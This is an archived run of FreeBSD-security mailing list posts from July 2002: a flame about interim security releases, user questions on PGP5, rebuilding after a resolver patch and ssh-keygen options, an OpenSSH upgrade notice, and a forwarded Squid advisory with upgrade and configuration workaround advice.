10:23:37 -0700 From: "brian j. peterson" To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: security fixes Message-ID: <20020703172337.GD32703@malkavian.org> Mail-Followup-To: Brett Glass , freebsd-security@FreeBSD.ORG References: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> <4.3.2.7.2.20020702155758.00e9a2c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020702155758.00e9a2c0@localhost> User-Agent: Mutt/1.4i X-URL: http://rbw.myplace.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [freebsd-security subscribers: this is a response to what i consider to be a horribly off-topic thread, so if you prefer to avoid such posts, please read no further and accept my apologies for subjecting you to even this much.] On Tue, Jul 02, 2002 at 04:06:13PM -0600, Brett Glass wrote: > > With the flurry of changes going on (including the OpenSSH hole and libc > hole in the base install and the Apache vulnerability in the ports and > packages), it'd be nice to see an interim release. Who here would be > in favor of that? Who, on the FreeBSD Core Team, might make the decision who here would be in favor of that? very few, i would hope. i know the last thing i want the FreeBSD team to do is spend all their limited volunteered time (and limited donated resources) on creating a new -RELEASE for every new security problem that is discovered. this would be a gross waste. they already spend plenty of time fixing the security problems as they crop up, so apply the patches they supply and recompile what you need to and be happy they are so responsive and informative and responsible. > to do an interim release before 4.7 (scheduled for October)? (Yes, it > takes work to put out a release, but do we really want everyone who wants > a secure system to have to install from -STABLE snapshots, running the > risk of picking a bad day, for four months?) of course we don't want a person who wants a secure system to install from a -STABLE snapshot, that's why it's not recommended. installs should be done with a -RELEASE and then updated as per the requirements of the user. if the user simply wants to keep up to date with the latest changes, he should update to (and probably track) RELENG_x and subscribe himself to the freebsd-stable mailing list. if the user desires security above all else, he should update to RELENG_x_y and subscribe himself to the freebsd-security-notifications mailing list. Brett? i've watched you harp on the same damn point for months now, and i know i'm not the only one getting tired of it. really, we get it. we know you want a brand new installable build for every new security problem that is discovered. i've watched you start new threads on this topic. i've watched you steer completely unrelated threads to this topic. i've watched you start new threads on very specific topics for very specific security bugs only to take flying leaps of logic to conclude (in essence) "clearly, we need constantly updating -RELEASE builds otherwise we're being grossly unethical, mean, and also probably smelly." WE. GET. IT. we also get that you're full of sound and fury (and whining and moaning), and little else. you talk and talk and talk and talk, but you don't actually try to DO anything. would a brand new installable build every few days be nice? sure. is it feasible? not currently, and probably not any time soon. and even if there were a new installable build every few days, what then? users would still have to go back and update their already installed systems. users would still have to keep informed about updates to FreeBSD. you seem to think that the update mechanism isn't good enough, and the FreeBSD developers would seem to agree; they are working on binary upgrades (as opposed to patch/compile upgrades), but these things don't happen overnight. and they don't happen any faster with you complaining about things. and they certainly wouldn't happen any faster if all of FreeBSD's resources were tied up in building new -RELEASEs every twelve minutes. if you are too impatient to wait for change to happen, MAKE it happen. get directly involved. contribute something tangible. that's the beauty of this FreeBSD thing; if you actually have something to contribute, you can actually make a real difference. -Brian -- --===-----=======-----------=============-----------------=================== bjp aka rbw | and did you exchange a walk on part in the war rbw@myplace.org | for a lead role in a cage? ===================-----------------=============-----------=======-----===-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 15:26:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B49F637B400 for ; Wed, 3 Jul 2002 15:26:30 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2AB2143E31 for ; Wed, 3 Jul 2002 15:26:30 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.226.230] by mail.gbronline.com (SMTPD32-7.10) id A9B9665D0100; Wed, 03 Jul 2002 17:24:57 -0500 Message-ID: <0f8501c222e0$9982cca0$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "brian j. peterson" , "Brett Glass" Cc: References: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> <4.3.2.7.2.20020702155758.00e9a2c0@localhost> <20020703172337.GD32703@malkavian.org> Subject: Re: security fixes Date: Wed, 3 Jul 2002 17:25:55 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yep, and if *I* wanted a new release every time the maintainers got around to building one after disclosure of a security issue, I'd go back to Windoze ... :-) [tongue bleeding from compression betwixt teeth & cheek...] KDK ----- Original Message ----- From: "brian j. peterson" To: "Brett Glass" Cc: Sent: Wednesday, July 03, 2002 12:23 PM Subject: Re: security fixes > [freebsd-security subscribers: this is a response to what i consider to > be a horribly off-topic thread, so if you prefer to avoid such posts, > please read no further and accept my apologies for subjecting you to > even this much.] > > > On Tue, Jul 02, 2002 at 04:06:13PM -0600, Brett Glass wrote: > > > > With the flurry of changes going on (including the OpenSSH hole and libc > > hole in the base install and the Apache vulnerability in the ports and > > packages), it'd be nice to see an interim release. Who here would be > > in favor of that? Who, on the FreeBSD Core Team, might make the decision > > who here would be in favor of that? very few, i would hope. > > i know the last thing i want the FreeBSD team to do is spend all their > limited volunteered time (and limited donated resources) on creating a new > -RELEASE for every new security problem that is discovered. this would be > a gross waste. they already spend plenty of time fixing the security > problems as they crop up, so apply the patches they supply and recompile > what you need to and be happy they are so responsive and informative and > responsible. > > > > to do an interim release before 4.7 (scheduled for October)? (Yes, it > > takes work to put out a release, but do we really want everyone who wants > > a secure system to have to install from -STABLE snapshots, running the > > risk of picking a bad day, for four months?) > > of course we don't want a person who wants a secure system to install from > a -STABLE snapshot, that's why it's not recommended. installs should be > done with a -RELEASE and then updated as per the requirements of the user. > if the user simply wants to keep up to date with the latest changes, he > should update to (and probably track) RELENG_x and subscribe himself to > the freebsd-stable mailing list. if the user desires security above all > else, he should update to RELENG_x_y and subscribe himself to the > freebsd-security-notifications mailing list. > > Brett? i've watched you harp on the same damn point for months now, and > i know i'm not the only one getting tired of it. really, we get it. we > know you want a brand new installable build for every new security problem > that is discovered. i've watched you start new threads on this topic. > i've watched you steer completely unrelated threads to this topic. i've > watched you start new threads on very specific topics for very specific > security bugs only to take flying leaps of logic to conclude (in essence) > "clearly, we need constantly updating -RELEASE builds otherwise we're > being grossly unethical, mean, and also probably smelly." WE. GET. IT. > > we also get that you're full of sound and fury (and whining and moaning), > and little else. you talk and talk and talk and talk, but you don't > actually try to DO anything. would a brand new installable build every > few days be nice? sure. is it feasible? not currently, and probably > not any time soon. and even if there were a new installable build every > few days, what then? users would still have to go back and update their > already installed systems. users would still have to keep informed about > updates to FreeBSD. you seem to think that the update mechanism isn't > good enough, and the FreeBSD developers would seem to agree; they are > working on binary upgrades (as opposed to patch/compile upgrades), but > these things don't happen overnight. and they don't happen any faster > with you complaining about things. and they certainly wouldn't happen > any faster if all of FreeBSD's resources were tied up in building new > -RELEASEs every twelve minutes. if you are too impatient to wait for > change to happen, MAKE it happen. get directly involved. contribute > something tangible. that's the beauty of this FreeBSD thing; if you > actually have something to contribute, you can actually make a real > difference. > > -Brian > > -- > --===-----=======-----------=============-----------------================ === > bjp aka rbw | and did you exchange a walk on part in the war > rbw@myplace.org | for a lead role in a cage? > ===================-----------------=============-----------=======-----===- - > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 15:54: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E36D37B400 for ; Wed, 3 Jul 2002 15:54:00 -0700 (PDT) Received: from smtp.netcabo.pt (smtp.netcabo.pt [212.113.174.9]) by mx1.FreeBSD.org (Postfix) with ESMTP id A6CD643E09 for ; Wed, 3 Jul 2002 15:53:58 -0700 (PDT) (envelope-from hununu@netcabo.pt) Received: from cheetah ([213.22.31.242]) by smtp.netcabo.pt with Microsoft SMTPSVC(5.0.2195.4905); Wed, 3 Jul 2002 23:53:22 +0100 From: "Hununu" Organization: Artists, Inc. To: Date: Wed, 3 Jul 2002 23:53:42 +0100 MIME-Version: 1.0 Subject: Re: limiting proxy access Reply-To: hununu@netcabo.pt Message-ID: <3D238E86.462.215A199@localhost> In-reply-to: <004301c22237$53670000$21020a0a@mti.ee.itb.ac.id> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body X-OriginalArrivalTime: 03 Jul 2002 22:53:22.0463 (UTC) FILETIME=[6EAEC2F0:01C222E4] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 3 Jul 2002 at 9:14, Asep Ruspeni wrote: > i use netstat to monitor which computer accessing proxy. sometimes manually deny > ip/tcp computer which consume much bandwidth than others using ipfw and > restarting squid daemon. (eg. using download accelerator plus which support > proxy could consume great amount bandwidth available) > > my question : > > is there any script i could use, to maintain bandwidth limitation so it will > automatically stop/limit bandwidth consuming without restarting squid daemon. This is not the right mailing list for this. FreeBSD-questions. Anyway, if you block the ip using ipfw, you do not need to re-start squid. You could also try to do a "man dummynet" and feel in heaven. If you really want to get high with bandwith control, you should try AltQ. :-] ...:-=>> The freaking Mail Band <<=-:... hununu@netcabo.pt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 16:34:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A840A37B400 for ; Wed, 3 Jul 2002 16:34:10 -0700 (PDT) Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0AC0743E09 for ; Wed, 3 Jul 2002 16:34:10 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Wed, 3 Jul 2002 19:34:07 -0400 From: Klaus Steden To: freebsd-security@freebsd.org Subject: PGP5 port Message-ID: <20020703193407.G762@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hopefully, this isn't a question that's been asked and answered already ... but can someone explain to me why the port of PGP5, when invoked, doesn't exit unless killed by signal 9? I'm not sure why, but if there's a reason to it, could someone please shed a little light on the matter? It's annoying the hell out of me to have to kill -9 it every time I use it. thanks, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 17:36:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C428D37B400; Wed, 3 Jul 2002 17:36:04 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 37DC743E09; Wed, 3 Jul 2002 17:36:04 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1DCBB534B; Thu, 4 Jul 2002 02:36:02 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: stable@freebsd.org Subject: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1 From: Dag-Erling Smorgrav Date: 04 Jul 2002 02:36:01 +0200 Message-ID: Lines: 16 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I finished the upgrade a little over an hour ago, and my post-commit buildworld just completed. It should now be safe to upgrade. Privilege separation is turned off by default, because it breaks Kerberos ticket passing. If you don't use ticket passing, or don't know what Kerberos is, it should be safe to turn privilege separation on in /etc/ssh/sshd_config (after make world and mergemaster, of course.) Please stay alert for any signs of ssh (particularly sshd) trouble, or unexpected changes in OpenSSH's behaviour, including unexpected changes in configuration defaults. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 19:26:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5D75D37B400 for ; Wed, 3 Jul 2002 19:26:44 -0700 (PDT) Received: from hotmail.com (f213.law15.hotmail.com [64.4.23.213]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26BBC43E52 for ; Wed, 3 Jul 2002 19:26:44 -0700 (PDT) (envelope-from amyshaftoe@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 3 Jul 2002 19:26:44 -0700 Received: from 12.237.225.124 by lw15fd.law15.hotmail.msn.com with HTTP; Thu, 04 Jul 2002 02:26:43 GMT X-Originating-IP: [12.237.225.124] From: "Amy Shaftoe" To: freebsd-security@freebsd.org Subject: Rebuilding the static programs Date: Wed, 03 Jul 2002 21:26:43 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 04 Jul 2002 02:26:44.0067 (UTC) FILETIME=[3D088330:01C22302] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since I don't have enough disk space to do a make world on my 4.6-RELEASE system, I was going to rebuild libc and the static programs individually after applying the FreeBSD-SA-02:28.resolv patch. I applied the patch then did a "make", "make install" and a "make clean" in /usr/src/lib/libc. That went fine. Then I did the same in /usr/src/sbin and that when fine. But in /usr/src/bin it dies with this: >===> rmail >Warning: Object directory not changed from original /usr/src/bin/rmail >ln -sf >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h >sm_os.h >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or directory >*** Error code 1 > >Stop in /usr/src/bin/rmail. >*** Error code 1 > >Stop in /usr/src/bin. Is this expected behavior? Should you be able to rebuild the system in this manner? _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 22:18: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5584337B400 for ; Wed, 3 Jul 2002 22:18:05 -0700 (PDT) Received: from relay.sambolian.net.nz (203-79-83-205.cable.paradise.net.nz [203.79.83.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04A1243E09 for ; Wed, 3 Jul 2002 22:18:04 -0700 (PDT) (envelope-from andy@sambolian.net.nz) Received: from grace.sambolian.net.nz (grace.sambolian.net.nz [192.168.0.11]) by relay.sambolian.net.nz (Postfix) with ESMTP id 4B6C357316 for ; Thu, 4 Jul 2002 17:18:02 +1200 (NZST) Received: by grace.sambolian.net.nz (Postfix, from userid 80) id 7B293FEB7; Thu, 4 Jul 2002 17:18:32 +1200 (NZST) Received: from 192.168.0.1 ( [192.168.0.1]) as user andy@imap.sambolian.net.nz by webmail.sambolian.net.nz with HTTP; Thu, 4 Jul 2002 17:18:32 +1200 Message-ID: <1025759912.3d23daa852532@webmail.sambolian.net.nz> Date: Thu, 4 Jul 2002 17:18:32 +1200 From: Andrew Thompson To: Amy Shaftoe Cc: freebsd-security@freebsd.org Subject: Re: Rebuilding the static programs References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Looks like you need to do a make in /usr/src/lib/libsm, as it can not find the file libsm.a in that directory. --Andrew Quoting Amy Shaftoe : > Since I don't have enough disk space to do a make world on my > 4.6-RELEASE system, I was going to rebuild libc and the static > programs individually after applying the FreeBSD-SA-02:28.resolv > patch. > > I applied the patch then did a "make", "make install" and a "make > clean" in /usr/src/lib/libc. That went fine. Then I did the same > in /usr/src/sbin and that when fine. But in /usr/src/bin it dies > with this: > > >===> rmail > >Warning: Object directory not changed from original /usr/src/bin/rmail > >ln -sf > >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h > >sm_os.h > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > > >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > > >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a > >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or directory > >*** Error code 1 > > > >Stop in /usr/src/bin/rmail. > >*** Error code 1 > > > >Stop in /usr/src/bin. > > Is this expected behavior? Should you be able to rebuild the > system in this manner? > > > _________________________________________________________________ > MSN Photos is the easiest way to share and print your photos: > http://photos.msn.com/support/worldwide.aspx > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 23:41:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C33837B400; Wed, 3 Jul 2002 23:41:13 -0700 (PDT) Received: from mail7.ec.rr.com (fe7.southeast.rr.com [24.93.67.54]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9462743E5E; Wed, 3 Jul 2002 23:41:12 -0700 (PDT) (envelope-from freebsd@ec.rr.com) Received: from makayla ([66.26.7.34]) by mail7.ec.rr.com with Microsoft SMTPSVC(5.5.1877.757.75); Thu, 4 Jul 2002 01:29:34 -0400 Date: Thu, 4 Jul 2002 01:31:31 -0400 From: Michael Sharp To: freebsd-security@FreeBSD.ORG Cc: freebsd-questions@FreeBSD.ORG Subject: ssk-keygen Message-Id: <20020704013131.1f7a014f.freebsd@ec.rr.com> X-Mailer: FreeBSD 4.6 http://www.freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I did a cvsup of RELENG_4 about 2 hours ago ( July 4th @ 12:05 am )and noticed the new openssh3.4p1 and pam.conf source so I decided to make world. On reboot, ssh-keygen fails to make RSA keys because in rc.network there is no -t rsa option when running ssh-keygen. ***I changed it*** and all is well. This is likely to come up on the questions and security list for those that did a cvsup at about the same time I did. I'm sure its been discovered and fixed by now. *** if [ ! -f /etc/ssh/ssh_host_key ]; then echo ' creating ssh RSA host key'; /usr/bin/ssh-keygen -t rsa -N "" -f /etc/ssh/ssh_host_key *** Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 4 1: 8: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B2E3237B405; Thu, 4 Jul 2002 01:07:24 -0700 (PDT) Received: from mail.imp.ch (mail.imp.ch [157.161.1.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50A3543E09; Thu, 4 Jul 2002 01:07:23 -0700 (PDT) (envelope-from mb@imp.ch) Received: from nbs.imp.ch (nbs.imp.ch [157.161.4.7]) by mail.imp.ch (8.11.6/8.11.6) with ESMTP id g6487Mj90017; Thu, 4 Jul 2002 10:07:22 +0200 (CEST) Received: from levais.imp.ch (levais.imp.ch [157.161.4.66]) by nbs.imp.ch (8.12.3/8.12.3) with ESMTP id g6487L9014592705; Thu, 4 Jul 2002 10:07:21 +0200 (MES) Date: Thu, 4 Jul 2002 10:09:27 +0200 (CEST) From: Martin Blapp To: Cc: Subject: Squid Security Update Advisory 2002:3 (fwd) Message-ID: <20020704100815.G39132-100000@levais.imp.ch> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I just got this on bugtraq ... ---------- Forwarded message ---------- Return-Path: Content-Type: text/plain; charset="us-ascii" From: Henrik Nordstrom Organization: MARA Systems AB To: Bugtraq Subject: Squid Security Update Advisory 2002:3 Date: Wed, 3 Jul 2002 23:25:06 +0200 User-Agent: KMail/1.4.1 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200207032325.07003@henrik.marasystems.com> __________________________________________________________________ Squid Proxy Cache Security Update Advisory SQUID-2002:3 __________________________________________________________________ Advisory ID: SQUID-2002:3 Date: July 3, 2002 Summary: Squid-2.4.STABLE7 released to address a number of security related issues. Affected versions: Squid-2.x up to and including 2.4.STABLE6 __________________________________________________________________ http://www.squid-cache.org/Advisories/SQUID-2002_3.txt __________________________________________________________________ Problem Description: squid-2.4.STABLE7 has been released to address a number of security issues in Squid and related software. All users of the Squid HTTP Proxy are strongly encouraged to upgrade. Security related changes in the 2.4.STABLE7 release: - Several bugfixes and cleanup of the Gopher client, both to correct some security issues and to make Squid properly render certain Gopher menus. - Security fixes in how Squid parses FTP directory listings into HTML - FTP data channels are now sanity checked to match the address of the requested FTP server. This to prevent theft or injection of data. See the new ftp_sanitycheck directive if this sanity check is not desired. - The MSNT auth helper has been updated to v2.0.3+fixes for buffer overflow security issues found in this helper. - A security issue in how Squid forwards proxy authentication credentials has been fixed Other changes in the 2.4.STABLE7 release: - Squid now correctly rejects any requests using transfer- encoding. Squid is a HTTP/1.0 proxy and as such does not implement or support transfer-encoding. - Minor changes to support Apple MAC OS X and some other platforms more easily. - The client -T option has been implemented - HTCP related bugfixes in "squid -k reconfigure" For more details on the changes see the descriptions in our patch archive for version Squid-2.4.STABLE6: http://www.squid-cache.org/Versions/v2/2.4/bugs/ ------------------------------------------------------------------ Severity: It is believed that several of the Gopher bug and the FTP directory parsing related bugs can be exploited to allow remote execution of code. The user executing the attack must be allowed to use the proxy for any potential attack to be successful, but it is believed that a remote attacker can use a small amount of social engineering to make an attack without direct access to the proxy. The third issue relating to FTP data channels is minor in nature in most installations, but there may be unfortunate interactions with firewalling policies etc making it a more severe issue than normal. The MSNT auth helper issue is believed to possibly allow remote execution of code in certain configurations. The issue in forwarding of proxy authentication credentials may expose your users private proxy login+password to selected external web sites depending on your configuration. __________________________________________________________________ Updated Packages: The Squid-2.4.STABLE7 release contains fixes for all these problems. You can download the Squid-2.4.STABLE7 release from ftp://ftp.squid-cache.org/pub/squid-2/STABLE/ http://www.squid-cache.org/Versions/v2/2.4/ or the mirrors (may take a while before all mirrors are updated). For a list of mirror sites see http://www.squid-cache.org/Mirrors/ftp-mirrors.html http://www.squid-cache.org/Mirrors/http-mirrors.html Individual patches to the mentioned issues can be found from our patch archive for version Squid-2.4.STABLE6 http://www.squid-cache.org/Versions/v2/2.4/bugs/ The patches should also apply with only a minimal effort to earlier Squid 2.4 versions if required. If you are using a prepackaged version of Squid then please refer to the package vendor for availability information on updated packages. __________________________________________________________________ Determining if your version is vulnerable: To determine which version of Squid you are using, run the command squid -v You are likely to be vulnerable to these issues if you are running version 2.4.STABLE6 or earlier. If you are using a binary or otherwise pre-packaged version please verify with your vendor on which versions are affected as some vendors ship earlier versions with the needed patches applied. Note that unless you have upgraded to a version released after 2002-07-01 you are most likely vulnerable to these issues. There is no easy means to determine if your version is affected other than by the Squid version number. You may be vulnerable to the MSNT auth issue if your squid.conf file contains the directive authenticate_program /usr/local/squid/libexec/squid/msnt_auth and you have not upgraded your copy of msnt_auth to a corrected version Note: msnt_auth is sometimes installed as msntauth, and the path may differ depending on the installation method. __________________________________________________________________ Other versions of Squid: Versions prior to the 2.4 series are deprecated, please update to Squid-2.4.STABLE7 if you are using a version older than 2.4. Users of unreleased versions of squid (2.6.DEVEL or 2.5.PRE versions) should run the most recent version available to ensure that security issues arising during the development are addressed as quickly as possible. Furthermore, unreleased versions should not be used in a production environment. __________________________________________________________________ Workarounds: We recommend that you upgrade rather than try to workaround the issues by configuration. To most of the issues there is no easy workarounds that does not severely impact the functionality. The Gopher and FTP issues can be worked around by denying proxying of ftp:// or gopher:// URLs, for example by inserting the following lines at the top of your squid.conf # Workaround for bugs in Squid-2.4.STABLE6 and earlier acl workaround proto FTP Gopher http_access deny workaround The authentication credentials issue only applies if you are using proxy authentication, allow users access to some sites without the need to authenticate and you do not fully trust these sites or the network between these sites and the proxy. To work around the problem make sure your users needs to authenticate on all sites or none. If you are using the msnt_auth authentication helper then you are only vulnerable if you are using the allowusers or denyusers extension of msnt_auth. To work around this defiance of msnt_auth you can use the proxy_auth acl type to specify the valid users and delete the allowusers and denyusers files. __________________________________________________________________ Contact details for the squid project: For installation / upgrade support: Your first point of contact should be your binary package vendor. If your install is built from the original squid sources, then the squid-users@squid-cache.org mailing list is your primary support point. (see for subscription details). For bug reporting, particularly security related bugs the squid-bugs@squid-cache.org mailing list is the appropriate forum. It's a closed list (though anyone can post) and security related bug reports are treated in confidence until the impact has been established. For non security related bugs, the squid bugzilla database should be used . __________________________________________________________________ Credits: Olaf Kirch (formerly @ Caldera), for reporting the FTP and Gopher related issues MARA Systems AB, for sponsoring the development of patches to the FTP, Gopher, authentication and transfer encoding issues. Duane Wessels, for fixes to the MSNT auth helper __________________________________________________________________ Revision history: 2002-07-03 21:10 GMT Initial release __________________________________________________________________ END To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 4 3: 0:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B991737B400; Thu, 4 Jul 2002 03:00:22 -0700 (PDT) Received: from freebsd.org.ru (sweet.etrust.ru [194.84.67.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 958DB43E09; Thu, 4 Jul 2002 03:00:21 -0700 (PDT) (envelope-from osa@freebsd.org.ru) Received: by freebsd.org.ru (Postfix, from userid 1000) id 2A70844; Thu, 4 Jul 2002 14:00:20 +0400 (MSD) Date: Thu, 4 Jul 2002 14:00:19 +0400 From: "Sergey A. Osokin" To: Martin Blapp Cc: adrian@freebsd.org, security@freebsd.org Subject: Re: Squid Security Update Advisory 2002:3 (fwd) Message-ID: <20020704100019.GA43573@freebsd.org.ru> References: <20020704100815.G39132-100000@levais.imp.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020704100815.G39132-100000@levais.imp.ch> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jul 04, 2002 at 10:09:27AM +0200, Martin Blapp wrote: > > Hi, > > I just got this on bugtraq ... > > __________________________________________________________________ > > Squid Proxy Cache Security Update Advisory SQUID-2002:3 > __________________________________________________________________ > > Advisory ID: SQUID-2002:3 > Date: July 3, 2002 > Summary: Squid-2.4.STABLE7 released to address a > number of security related issues. > Affected versions: Squid-2.x up to and including 2.4.STABLE6 > __________________________________________________________________ > > http://www.squid-cache.org/Advisories/SQUID-2002_3.txt > __________________________________________________________________ Yes, please look at http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/40175 Thanks. -- Rgdz, Sergey Osokin, osa@FreeBSD.org.ru To Unsubscribe: send mail to 